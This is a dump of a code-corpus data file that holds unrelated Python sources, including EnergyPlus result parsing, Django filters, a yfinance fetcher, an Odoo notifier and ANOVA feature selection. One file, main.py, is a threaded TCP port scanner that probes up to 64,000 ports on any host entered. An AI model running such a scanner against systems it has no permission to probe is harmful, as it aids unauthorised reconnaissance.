res[key][i]['Unit'] in {'C','W/m2-K','W/m2'}:\n BuildAgregRes[KeyArea][i]['GlobData'] = [sum(x)/2 for x in 
zip(BuildAgregRes[KeyArea][i]['GlobData'], ZoneAgregRes[key][i]['GlobData'])]\n else:\n BuildAgregRes[KeyArea][i]['GlobData'] = [sum(x) for x in zip(BuildAgregRes[KeyArea][i]['GlobData'], ZoneAgregRes[key][i]['GlobData'])]\n\n return ZoneAgregRes if ZoneOutput else BuildAgregRes\n\ndef Plot_Outputs(res,idf):\n # visualization of the results\n timestp = idf.idfobjects['TIMESTEP'][0].Number_of_Timesteps_per_Hour\n endtime = int(len(res['Environment']['Site Outdoor Air Drybulb Temperature']['GlobData']) / timestp)\n for nb,key in enumerate(res):\n plt.figure(nb)\n for j,i in enumerate(res[key]):\n plt.subplot(2,int((len(res[key])-1)/2+1),j+1)\n if not res[key][i]['TimeStep'] in 'TimeStep':\n timestp = 1\n plt.plot(np.linspace(0, endtime, endtime * timestp), res[key][i]['GlobData'])\n plt.title(i+'('+res[key][i]['Unit']+')')\n\n plt.show()\n\ndef Read_Outputhtml(CaseName):\n #compairons of surfaces\n fname = CaseName\n filehandle = open(fname, 'r',encoding='latin-1').read() # get a file handle to the html file\n htables = readhtml.titletable(filehandle)\n #this few lines below is just to grab the names of outdoor facing surfaces and windows\n for i in range(len(htables)):\n if htables[i][0] in 'Opaque Exterior':\n Opaque_exterior = htables[i][1][1:]\n elif htables[i][0] in 'Exterior Fenestration':\n Windows_exterior = htables[i][1][1:]\n EndUsesIdx = 3\n ExtSurf = [name[0] for name in Opaque_exterior if 'WALL' in name[1]]\n ExtWin = [name[0] for name in Windows_exterior]\n ExtNames = ExtSurf+ExtWin\n Res = {}\n\n for key in range(len(htables[EndUsesIdx][1][1:-2])):\n Res[htables[EndUsesIdx][1][key+1][0]] = {}\n for val in range(len(htables[EndUsesIdx][1][0][1:])):\n Res[htables[EndUsesIdx][1][key+1][0]][htables[EndUsesIdx][1][0][val+1]] = htables[EndUsesIdx][1][key+1][val+1]\n return {'GlobRes':Res, 'OutdoorSurfacesNames' : ExtNames}\n\ndef Read_OutputError(CaseName):\n fname = CaseName\n Endsinfo = open(fname, 'r', encoding='latin-1').read()\n Endsinfo\n\nif __name__ 
== '__main__' :\n print('Set_Outputs Main')","sub_path":"CoreFiles/Set_Outputs.py","file_name":"Set_Outputs.py","file_ext":"py","file_size_in_byte":14607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591289103","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\nM= [[0,0,0] for i in range(3)] \nM5=M\nM3=M[:]\nprint(M5)\nprint(M3[1][1])\nM[1][1]=5\nprint(M)\nimport copy\nM4=copy.deepcopy(M)\nM5=M\nM[1][1]=0\nprint(M4)\nprint(M5)","sub_path":"INF_1_BE_1/ListeCopie.py","file_name":"ListeCopie.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545319484","text":"import django_filters\nfrom .models import Item, Category\nfrom django_filters import rest_framework as filters\n\n\nclass ItemFilter(django_filters.FilterSet):\n \n\n CHOICES = (\n ('ascending', 'Ascending'),\n ('descending', 'Decending')\n ) \n ordering = django_filters.ChoiceFilter(label='Ordering', choices=CHOICES, method='filter_by_order')\n \n\n class Meta:\n model = Item\n fields = {\n 'title':['icontains'],\n 'price': ['lt', 'gt'],\n \n }\n def filter_by_order(self,queryset,name,value):\n expression = 'pub_date' if value=='ascending' else '-pub_date'\n return queryset.order_by(expression)","sub_path":"core/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300681770","text":"import socket\nimport _thread\nimport time\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\nclass Core(object):\n ipurl=0\n mode=1024\n menu1=False\n f=None\n network_speed=\"LAN\"\n menu2=False\n def GetData(self, url):\n self.url = url\n try:\n self.ipurl = socket.gethostbyname(self.url)\n except 
Exception as e:\n print (\"Invalid URL or IP\")\n exit(0)\n Core.ipurl=self.ipurl\n print (60*\"-\")\n print (22*\" \",bcolors.FAIL,\"Port Scanner v1\",bcolors.ENDC)\n print (60*\"-\")\n while Core.menu1 is not True:\n choice = input(\"\\n1 - simple \\n2 - extended\\n\")\n if choice == \"1\":\n Core.mode=1024\n menu=True\n break\n elif choice == \"2\":\n Core.mode=64000\n menu = True\n break\n else:\n print(\"Incorrect answer, choose 1 or 2\")\n while Core.menu2 is not True:\n choice = input(\"\\n1 - LAN \\n2 - Global Network\\n\")\n if choice == \"1\":\n Core.network_speed=0.05\n menu2=True\n break\n elif choice == \"2\":\n Core.network_speed=0.3\n menu2 = True\n break\n else:\n print(\"Incorrect answer, choose 1 or 2\")\n\n def Start_Scan(self, port_start, port_end):\n Core.f = open(Core.ipurl, \"a\")\n try:\n for x in range(port_start,port_end):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n res = sock.connect_ex((Core.ipurl,x))\n if res is 0:\n tmp=\"Port\",x,\"is open\", socket.getservbyport(x)\n tmp1=str(tmp[0])+\" \"+str(tmp[1])+\" \"+str(tmp[2])+\" \"+str(tmp[3])\n print(bcolors.OKGREEN,tmp1)\n Core.f.write(str(tmp)+\"\\n\")\n Core.f.close()\n except Exception as e:\n print (e)\ntry:\n scan = Core()\n scan.GetData(input(\"Type IP or address\\n\"))\n print(bcolors.WARNING,\"Range:\",Core.mode,\"\\n Target:\",Core.ipurl,\"\\n Scanning speed:\",Core.network_speed,bcolors.ENDC)\n print(bcolors.BOLD,\"Please wait...\",bcolors.ENDC)\n for count in range(0,Core.mode):\n #print (Core.mode)\n time.sleep(Core.network_speed)\n _thread.start_new_thread(scan.Start_Scan, (count,count+1))\n if count > Core.mode:\n exit(0)\nexcept Exception as e:\n print (e)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"120953099","text":"from keras.preprocessing.image import ImageDataGenerator\n\n\ndef train_on_gen(dirname, 
shape_target=(224,224)):\n train_datagen = ImageDataGenerator()\n train_generator = train_datagen.flow_from_directory(\n directory=dirname,\n target_size=shape_target,\n color_mode=\"rgb\",\n batch_size=32,\n class_mode=\"categorical\",\n shuffle=True,\n seed=42\n )\n return train_generator","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"275597014","text":"\"\"\"\nProjeto final de Eletrónica de Potência 2015/2016.\nCálculo do condensador.\n\"\"\"\n\n__author__ = \"paulogp\"\n__copyright__ = \"Copyright (C) 2015 Paulo G.P.\"\n__date__ = \"09/12/2015\"\n\n\ndef T(f):\n \"\"\"\n Período.\n :param f: float - frequência\n :return: float\n \"\"\"\n return 1 / f\n\n\ndef vo(_D, _vi):\n \"\"\"\n Tensão de saída.\n :param D: float - razão cíclica\n :param vi: float - tensão de entrada\n :return: float\n \"\"\"\n return _D * _vi\n\n\ndef C_out(_D, _T, _vo, _L, _Dvo):\n \"\"\"\n Condensador de saída.\n :param D: float - razão cíclica\n :param T: float - período\n :param vi: float - tensão de entrada\n :param L: float - indutância\n :param Dvo: float - ondulação da tensão de saída\n :return: float\n \"\"\"\n return ((1 - _D) * _T**2 * _vo) / (8 * _L * _Dvo)\n\nif __name__ == \"__main__\":\n # parametros\n D = 0.5 # 0.4\n vi = 11\n f = 40000 # 50000\n L = 680 * 10**-6\n Dvo = 0.1\n\n # output\n print(\"T: {:.3}s\".format(T(f)))\n print(\"vo: {:.3}V\".format(vo(D, vi)))\n print(\"Co: {:.3}F\".format(C_out(D, T(f), vo(D, vi), L, Dvo)))\n","sub_path":"eltrp/calculo_projeto.py","file_name":"calculo_projeto.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84775439","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG)\nLOG = logging.getLogger(__name__)\n\n# create a file handler\nhandler = 
logging.FileHandler('cart_Log.log')\n\n# create a logging format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\n\n# add the handlers to the logger\nLOG.addHandler(handler)\n","sub_path":"src/com/jalasoft/shopping_car/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"313363196","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport time\nfrom nxp_imu import IMU\nfrom slurm.rate import Rate\nfrom the_collector import BagIt, Pickle\nfrom colorama import Fore\nfrom threaded_camera import ThreadedCamera\n\nthumb = False\nbag = BagIt(Pickle)\nimu = IMU(gs=2, dps=2000, verbose=True)\nrate = Rate(20)\n\n# res = (3008,480)\n# res = (1024,720)\n# res = (640,480)\nres = (320,240)\ncamera = ThreadedCamera(res, fmt=\"gray\")\n\nstart = time.time()\nlast = start\ntry:\n while True:\n a, m, g = imu.get()\n ts = time.time()\n dt = ts - last\n hz = int(1/dt)\n last = ts\n print('{} Hz/{:.2f} s | {:>5.2f} {:>5.2f} {:>5.2f} | {:>6.1f} {:>6.1f} {:>6.1f} | {:>6.1f} {:>6.1f} {:>6.1f} |'.format(\n hz,dt,\n a[0], a[1], a[2],\n m[0], m[1], m[2],\n g[0], g[1], g[2]),\n end = \"\\r\"\n )\n bag.push(\"imu\", (a,g,m,time.time(),))\n\n frame = camera.read()\n\n if frame is None:\n print(f\"{Fore.RED}*** Camera Fail ***{Fore.RESET}\")\n else:\n bag.push(\"camera\", (frame,time.time(),))\n\n rate.sleep()\n\nexcept KeyboardInterrupt:\n camera.stop()\n camera.join()\n print(\">> bye ...\")\n bag.write(\"test\", timestamp=False)\n","sub_path":"python/dev/path-data/grab-data.py","file_name":"grab-data.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109958896","text":"from datetime import datetime, date, time, timedelta\nfrom openerp import models, fields, api\nfrom openerp.tools.translate import 
_\nfrom openerp.osv import osv\n\n\nclass CustomSalesQuotation(models.Model):\n _inherit = 'sale.order'\n\n days_without_activity = fields.Integer(string=\"Notify after (days)\", default=5)\n group_to_be_notified = fields.Many2one('res.groups',string=\"Group to be notified\")\n inactivity_notification = fields.Boolean(string=\"Inactivity Notification\", default=True)\n notification_has_been_generated = fields.Boolean(string=\"Notification Generated\", default=False)\n\n @api.model\n def _get_see_all_leads_group(self):\n res = self.env['res.groups'].search([('name', '=', 'See all Leads')], limit=1)\n return res and res.id or False\n\n _defaults = {\n 'group_to_be_notified' : _get_see_all_leads_group,\n }\n\n\n @api.multi\n def check_for_inactive_quotations(self):\n\n #get the quotations in draft and have the inactivity notifier activated\n quotations = self.env['sale.order'].search([('state', '=', 'draft'),('inactivity_notification', '=', True),\n ('notification_has_been_generated', '=', False)])\n subtype = self.env['mail.message.subtype'].search([('id', '=', 1)])\n\n # For each quotation, check if the difference between the creation date\n # and update date is already equal or in excess of the\n # days without activity\n for quotation in quotations:\n write_date = datetime.strptime(quotation.write_date, '%Y-%m-%d %H:%M:%S')\n create_date = datetime.strptime(quotation.create_date, '%Y-%m-%d %H:%M:%S')\n days_inactivity = write_date - create_date\n\n pref_msg = \"Quotation number {} did not have any activity for the past {} days.\"\n pref_subject = \"{}: Quotation has no activity for {} days.\"\n pref_body = \"Get an update for Quotation {}\"\n if days_inactivity >= quotation.days_without_activity:\n # Generate notification\n quotation.notification_has_been_generated = True\n msg = pref_msg.format(quotation.name, str(days_inactivity))\n\n group = quotation.group_to_be_notified\n recipient_partners = list()\n for recipient in group.users:\n 
recipient_partners.append((4, recipient.partner_id.id))\n\n new_context = {'thread_model':'sale.order'}\n post_vars = {\n 'subject': pref_subject.format(quotation.name, quotation.days_without_activity),\n 'body': pref_body.format(quotation.name),\n 'partner_ids': recipient_partners,\n 'model' : 'sale.order',\n 'res_id' : quotation.id,\n }\n\n thread_pool = self.pool.get('mail.thread')\n thread_pool.message_post(\n self.env.cr,\n self.env.uid,\n quotation.id,\n type=\"notification\",\n subtype=\"mt_comment\",\n context=new_context,\n **post_vars\n )\n","sub_path":"quotation_notifier/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52657457","text":"from pandas._libs.tslibs.timestamps import Timestamp\nimport yfinance as yf\nimport pandas as pd\nimport argparse\nimport datetime\nimport logging\nimport pprint\nimport json\nimport sys\nimport os\n\n\n\ndef initArgparse() -> argparse.ArgumentParser:\n def make_wide(formatter, w=120, h=36):\n \"\"\"Return a wider HelpFormatter, if possible.\"\"\"\n try:\n # https://stackoverflow.com/a/5464440\n kwargs = {'width': w, 'max_help_position': h}\n formatter(None, **kwargs)\n return lambda prog: formatter(prog, **kwargs)\n except TypeError:\n return formatter\n\n parser = argparse.ArgumentParser(\n usage=\"%(prog)s [OPTIONS]...\",\n description=\"Fetches historical data for strategies' backtests\",\n formatter_class=make_wide(argparse.HelpFormatter, w=80, h=20)\n )\n\n parser.add_argument(\n \"-v\", \"--version\", action=\"version\",\n version=f\"{parser.prog} version 1.0.0\"\n )\n\n loglevels = [\"DEBUG\", \"INFO\", \"WARN\", \"ERROR\", \"FATAL\"]\n parser.add_argument(\n \"-l\", \"--loglevel\", metavar=\"LOGLEVEL\",\n default=\"INFO\", choices=loglevels,\n help=f\"Set LOGLEVEL{loglevels} [default='INFO']\"\n )\n\n def getDefultConfigFilename():\n return os.path.splitext(sys.argv[0])[0] + 
\".json\"\n\n defaultConfig = getDefultConfigFilename()\n parser.add_argument(\n \"-c\", \"--config\", default=defaultConfig,\n help=f\"Set configuration [default={defaultConfig}]\"\n )\n\n parser.add_argument(\n \"-f\", \"--force\", action='count', default=0,\n help=\"Overwrite existing data files [default=(skip download if the file exists)]\"\n )\n\n parser.add_argument(\n \"-d\", \"--dryrun\", action='store_true', default=False,\n help=\"Read config and validate target folders but don't download any data\"\n )\n\n return parser\n\nclass ConfigError(Exception):\n pass\n\ndef parseConfig(configJson):\n\n def collectSymbolsConfig(configJson) -> dict:\n\n def collectSymbolConfigParams(configSectionName, paramsJson) -> dict:\n params = {}\n currentDate = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n if \"period\" in paramsJson:\n periodJson = paramsJson[\"period\"]\n\n if \"start\" in periodJson:\n start = datetime.datetime.strptime(periodJson[\"start\"], \"%Y-%m-%d\")\n else:\n raise ConfigError(f\"[{configSectionName}] Config doesn't have mandatory 'period.start' field\")\n if start >= currentDate:\n raise ConfigError(f\"[{configSectionName}] Config start[{start}] must be before current date[{currentDate}]\")\n\n if \"end\" in periodJson:\n end = datetime.datetime.strptime(periodJson[\"end\"], \"%Y-%m-%d\")\n if start < end:\n params[\"period\"] = {\"start\" : start, \"end\" : end}\n elif start == end:\n raise ConfigError(f\"[{configSectionName}] Config period start[{start}] == end[{end}]\")\n else:\n logging.warn(f\"[{configSectionName}] Config period start[{start}] > end[{end}]. 
Fixing it by swapping 2 values\")\n params[\"period\"] = {\"start\" : end, \"end\" : start}\n else:\n params[\"period\"] = {\"start\" : start, \"end\" : currentDate}\n\n params[\"symbols\"] = paramsJson.get(\"symbols\", [])\n\n if len(params[\"symbols\"]) and not \"period\" in params:\n raise ConfigError(f\"[{configSectionName}] Config has symbols but doesn't have period. Please specify period (or remove symbols)\")\n if not len(params[\"symbols\"]) and \"period\" in params:\n raise ConfigError(f\"[{configSectionName}] Config doesn't have symbols but has period. Please specify symbols (or remove period)\")\n\n return params\n\n def mergeSymbolsConfig(symbolsConfig, params) -> dict:\n newPeriod = params[\"period\"]\n for symbol in params[\"symbols\"]:\n if symbol in symbolsConfig:\n existingPeriod = symbolsConfig[symbol][\"period\"]\n symbolsConfig[symbol] = {\n \"period\": {\n \"start\" : min(existingPeriod[\"start\"], newPeriod[\"start\"]),\n \"end\" : max(existingPeriod[\"end\"], newPeriod[\"end\"])\n }\n }\n else:\n symbolsConfig[symbol] = {\"period\" : newPeriod}\n\n symbolsConfig = {}\n configSectionName = \"TopLevel\"\n globalParams = collectSymbolConfigParams(configSectionName, configJson)\n mergeSymbolsConfig(symbolsConfig, globalParams)\n if \"strategy\" in configJson:\n for stratJson in configJson[\"strategy\"]:\n configSectionName = stratJson.get(\"name\", \"UnknownStrat\")\n stratParams = collectSymbolConfigParams(configSectionName, stratJson)\n if len(stratParams[\"symbols\"]):\n mergeSymbolsConfig(symbolsConfig, stratParams)\n else:\n logging.warn(f\"[{configSectionName}] Config doesn't have symbols. This section will be skipped\")\n\n if not len(symbolsConfig):\n logging.warn(\"Config doesn't have symbols. 
Nothing to download\")\n\n return symbolsConfig\n\n def collectInterval(configJson) -> str:\n if \"interval\" in configJson:\n interval = configJson[\"interval\"]\n acceptedIntervals = [\"1h\",\"1d\"]\n if interval not in acceptedIntervals:\n raise ConfigError(\"[TopLevel] Config 'interval' field recognized values: {acceptedIntervals}, however '{interval}' found\")\n return interval\n else:\n raise ConfigError(\"[TopLevel] Config must contain 'interval' field, possible values : {acceptedIntervals}\")\n\n def collectFolder(configJson) -> str:\n if \"folder\" in configJson:\n return configJson[\"folder\"]\n else:\n raise ConfigError(\"[TopLevel] Config must contain 'folder' field\")\n\n symbolsFetchConfig = {\n \"symbols\" : collectSymbolsConfig(configJson),\n \"interval\" : collectInterval(configJson),\n \"folder\" : collectFolder(configJson)\n }\n\n return symbolsFetchConfig\n\n\ndef fetchData(args) -> None:\n logging.info(f\"Loading configuration from file : {args.config}\")\n with open(args.config) as configFile:\n baseDir = os.path.dirname(os.path.abspath(args.config))\n logging.debug(f\"Config folder : {baseDir}\")\n\n config = json.load(configFile)\n symbolsFetchConfig = parseConfig(config)\n logging.debug(f\"Use parsed config to fetch symbol data:\\n{pprint.pformat(symbolsFetchConfig)}\")\n\n def prepareFolder(baseDir, folder):\n if not os.path.isabs(folder):\n folder = os.path.normpath(os.path.join(baseDir, folder))\n if os.path.exists(folder):\n if not os.path.isdir(folder):\n raise Exception(f\"Path {folder} exists but it's not a folder. Please review your data folder strurcture\")\n else:\n logging.info(f\"Folder {folder} doesn't exist. 
Creating it...\")\n os.mkdir(folder)\n return folder\n \n symbolFolder = prepareFolder(baseDir, symbolsFetchConfig[\"folder\"])\n\n for symbol, symbolConfig in symbolsFetchConfig[\"symbols\"].items():\n symbolFilename = symbol.lower() + \".zip\"\n symbolPath = os.path.join(symbolFolder, symbolFilename)\n symbolStart = symbolConfig[\"period\"][\"start\"]\n symbolEnd = symbolConfig[\"period\"][\"end\"]\n interval = symbolsFetchConfig[\"interval\"]\n\n if os.path.exists(symbolPath):\n if not os.path.isfile(symbolPath):\n raise Exception(f\"Target symbol {symbol} path is not a regular file: {symbolPath}. Please review your data folder structure\")\n df = pd.read_csv(symbolPath, names=[\"Date\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\"])\n logging.debug(f\"First line :\\n{df.head(1)}\")\n logging.debug(f\"File dates : [{df.iloc[0]['Date']},{df.iloc[-1]['Date']}]\")\n fileStart = datetime.datetime.strptime(df.iloc[0]['Date'], \"%Y%m%d %H:%M\")\n fileEnd = datetime.datetime.strptime(df.iloc[-1]['Date'], \"%Y%m%d %H:%M\")\n\n isIncompleteDataFile = symbolStart < fileStart or fileEnd < symbolEnd\n if isIncompleteDataFile:\n shouldReplaceExistingFile = args.force > 0\n logMsg = (\n f\"Symbol {symbol} file exists : {symbolPath}. \"\n f\"However it doesn't contain required historical period. \"\n f\"File dates [{fileStart},{fileEnd}]. \"\n f\"Configured dates [{symbolStart},{symbolEnd}].\")\n else:\n shouldReplaceExistingFile = args.force > 1\n logMsg = (\n f\"Symbol {symbol} file exists : {symbolPath}. \"\n f\"It contains larger period of histrocal data. \"\n f\"File dates [{fileStart},{fileEnd}]. 
\"\n f\"Configured dates [{symbolStart},{symbolEnd}].\")\n\n if not shouldReplaceExistingFile:\n requiredForce = \"-f\" if isIncompleteDataFile else \"-ff\"\n logMsg += f\" Skipping symbol download (you can use {requiredForce} to enforce it).\"\n if isIncompleteDataFile:\n logging.info(logMsg)\n else:\n logging.debug(logMsg)\n continue\n else:\n shouldReplaceExistingFile = False\n\n def symbolEndAdjustment(interval):\n # This adjustment is required because:\n # 1) Yahoo Finance interpret \"end\" as open range, i.e. [start,end);\n # 2) Next day (or hour) may not be tradable so we need to more than 1 day or 1 hour\n if interval == \"1d\":\n return datetime.timedelta(days=7)\n elif interval == \"1h\":\n return datetime.timedelta(days=1, hours=1)\n else:\n raise Exception(f\"Uknonwn interval {interval}\")\n\n symbolEnd += symbolEndAdjustment(interval)\n\n logging.info(f\"Downloading {symbol} : {symbolStart} : {symbolEnd}\")\n logging.getLogger().handlers[0].flush()\n df = yf.download(\n symbol,\n start=symbolStart,\n end=symbolEnd,\n interval=interval,\n auto_adjust = True\n )\n print(\"Done\")\n sys.stdout.flush()\n\n def yahooFinanceDateToQuantConnect(yfDate : Timestamp) -> str:\n # 2021-06-30 -> 20210630 00:00\n return yfDate.strftime(\"%Y%m%d %H:%M\")\n def yahooFinanceNumToQuantConnect(yfNum : float) -> int:\n # 427.209991 -> 4272099\n return int(yfNum * 10000)\n logging.debug(f\"Got data\\n{df.head(2)}\\n...\")\n df.reset_index(level=0, inplace=True)\n\n # I use df.columns[0] instead of \"Date\" because yfinance doesn't always return the same name of the field for different intervals\n df[\"QCDate\"] = df[df.columns[0]].transform(yahooFinanceDateToQuantConnect)\n df[\"QCOpen\"] = df[\"Open\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCHigh\"] = df[\"High\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCLow\"] = df[\"Low\"].transform(yahooFinanceNumToQuantConnect)\n df[\"QCClose\"] = df[\"Close\"].transform(yahooFinanceNumToQuantConnect)\n\n 
logging.debug(f\"convert data format\\n{df[['QCDate', 'QCOpen', 'QCHigh', 'QCLow', 'QCClose', 'Volume']].head(1)}\")\n\n downloadSymbolPath = symbolPath + \".download\"\n csvFileName = symbol.lower() + \".csv\"\n df[['QCDate', 'QCOpen', 'QCHigh', 'QCLow', 'QCClose', 'Volume']].to_csv(\n downloadSymbolPath,\n index=False,\n header=False,\n compression={\n \"method\" : 'zip',\n \"archive_name\" : csvFileName\n }\n )\n if shouldReplaceExistingFile:\n os.replace(downloadSymbolPath, symbolPath)\n else:\n os.rename(downloadSymbolPath, symbolPath)\n logging.info(\"Data fetch is completed\")\n\n\ndef main() -> None:\n parser = initArgparse()\n args = parser.parse_args()\n\n logging.basicConfig(format=\"%(asctime)s %(levelname)-4s %(message)s\", level=logging.getLevelName(args.loglevel), datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n fetchData(args)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"src/strategy/fetchData.py","file_name":"fetchData.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25422681","text":"# -*- coding: utf-8 -*-\n__author__ = 'jack'\n\nclass Solution:\n def preorder(self, root):\n res = []\n return self.helper(root, res)\n\n def helper(self, root, traverse):\n if root:\n traverse.append(root.val)\n if root.children:\n for child in root.children:\n self.helper(child, traverse)\n return traverse","sub_path":"Week_02/589.n_ary_tree_preorder_traversal.py","file_name":"589.n_ary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"378807182","text":"#\n# anova_feature_selection.py\n#\n# z katalogu --input-dir\n# trzy pliki: train_data.pkl, test_data.pkl, class_names.pkl\n#\n# Uczy się na danych z train_data.pkl wyliczając ANOVA i wybierając k-najlepszych cech\n# To same cechy wybiera z train_data.pkl\n# Wynik zapisywany jest do 
--output-dir\n\n# UWAGA zarówno output- jak i input-dir wpisujemy z '\\' (na windowsie) lub '/' (na Linuxie) na końcu ścieżki\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n# from sklearn.manifold import TSNE\n# from sklearn import decomposition\nfrom sklearn.feature_selection import SelectKBest, f_classif\n# from sklearn import datasets, metrics\n# from sklearn.manifold import TSNE\nfrom sklearn.metrics import classification_report\n\nimport time\nimport argparse\n\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# from sklearn.naive_bayes import GaussianNB\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn.svm import SVC\n\n\ndef read_data(input_dir):\n # wczytujemy dane treningowe:\n train_data_infile = open(input_dir + 'train_data.pkl', 'rb') # czytanie z pliku\n data_train_all_dict = pickle.load(train_data_infile)\n\n x_train = data_train_all_dict[\"data\"]\n y_train = data_train_all_dict[\"classes\"]\n\n # wczytujemy dane testowe:\n test_data_infile = open(input_dir + 'test_data.pkl', 'rb') # czytanie z pliku\n data_test_all_dict = pickle.load(test_data_infile)\n\n x_test = data_test_all_dict[\"data\"]\n\n y_test = data_test_all_dict[\"classes\"]\n\n # i nazwy klas\n cl_names_infile = open(input_dir + 'class_names.pkl', 'rb')\n classes_names = pickle.load(cl_names_infile)\n\n print(\"Data loaded from \" + input_dir)\n\n return x_train, y_train, x_test, y_test, classes_names\n\n\ndef save_data(x_train, y_train, x_test, y_test, classes_names, output_dir):\n # zapisujemy dane treningowe\n x_train_all_dict = {'data': x_train,\n 'classes': y_train}\n\n train_data_outfile = open(output_dir + 'train_data.pkl', 'wb')\n pickle.dump(x_train_all_dict, train_data_outfile)\n\n # zapisujemy dane testowe\n x_test_all_dict = {'data': x_test,\n 'classes': y_test}\n\n test_data_outfile = open(output_dir + 'test_data.pkl', 'wb')\n pickle.dump(x_test_all_dict, test_data_outfile)\n\n # 
zapisujemy nazwy klas\n cl_names_outfile = open(output_dir + 'class_names.pkl', 'wb')\n pickle.dump(classes_names, cl_names_outfile)\n\n print(\"Pickles saved in \", output_dir)\n\n\ndef ParseArguments():\n parser = argparse.ArgumentParser(description=\"Project\")\n parser.add_argument('--input-dir', default=\"\", required=True, help='data dir (default: %(default)s)')\n parser.add_argument('--output-dir', default=\"\", required=True, help='output dir (default: %(default)s)')\n parser.add_argument('--n', default=\"\", required=True, help='output dir (default: %(default)s)')\n args = parser.parse_args()\n\n return args.input_dir, args.output_dir, args.n\n\n\ninput_dir, output_dir, n_comp = ParseArguments()\n\nn_comp = int(n_comp)\n\n# wczytujemy dane\nx_train, y_train, x_test, y_test, classes_names = read_data(input_dir)\n\n###ANOVA\n\nprint(\"ANOVA reduction \", x_train.shape[1], \" -> \", n_comp, \" ...\", end =\" \")\n\nanova_filter = SelectKBest(f_classif, k=n_comp)\n\n## wwybranie odpowiednich cech na podstawie wyliczeń wykonanych na x_train\nstart_time = time.time()\nx_train_reduced = anova_filter.fit_transform(x_train, y_train)\nprint(\" took %s seconds \" % round((time.time() - start_time),5))\n\n# wybranie tych samych cech z x_test\n\nx_test_reduced = anova_filter.transform(x_test)\n\n\n# zapisujemy dane\n\nsave_data(x_train_reduced, y_train, x_test_reduced, y_test, classes_names, output_dir)\n","sub_path":"scripts/z6_anova_feature_selection.py","file_name":"z6_anova_feature_selection.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"612780373","text":"import os\nimport sys\nimport shutil\nimport tempfile\nfrom os.path import dirname, isdir, realpath\n\n\ndef _convert_path(path):\n \"\"\"Given a Unix path, convert it for the current platform.\n \"\"\"\n return os.sep.join(path.split('/'))\n\n\ndef _convert_paths(paths):\n \"\"\"Given a tuple of Unix paths, 
convert them for the current platform.\n \"\"\"\n return tuple([_convert_path(p) for p in paths])\n\n\ndef _get_tempdir():\n \"\"\"Return a temporary directory we can use for our fixture.\n \"\"\"\n return os.path.realpath(os.path.join(tempfile.gettempdir(), 'fsfix'))\n\n\nclass Mk(object):\n\n def __init__(self, root=None):\n self.root = root if root is not None else _get_tempdir()\n self.cwd = None # set in __call__\n self.teardown() # start clean\n\n\n def __call__(self, *treedef):\n \"\"\"Given a treedef, build a filesystem fixture in self.root.\n\n treedef is a sequence of strings and tuples. If a string, it is interpreted\n as a path to a directory that should be created. If a tuple, the first\n element is a path to a file, the second is the contents of the file. We do\n it this way to ease cross-platform testing.\n\n \"\"\"\n self.cwd = os.getcwd()\n os.mkdir(self.root)\n os.chdir(self.root)\n for item in treedef:\n if isinstance(item, basestring):\n path = _convert_path(item.lstrip('/'))\n path = os.sep.join([self.root, path])\n os.makedirs(path)\n elif isinstance(item, tuple):\n filepath, contents = item\n path = _convert_path(filepath.lstrip('/'))\n path = os.sep.join([self.root, path])\n parent = dirname(path)\n if not isdir(parent):\n os.makedirs(parent)\n file(path, 'w').write(contents)\n\n\n def teardown(self):\n \"\"\"Roll back fixture.\n\n - reset the current working directory\n - remove self.root from the filesystem\n - remove self.root from sys.path\n\n \"\"\"\n if self.cwd is not None:\n os.chdir(self.cwd)\n self.remove()\n while self.root in sys.path:\n sys.path.pop(self.root)\n\n tear_down = tearDown = teardown\n\n\n def resolve(self, path=''):\n \"\"\"Given a relative path, return an absolute 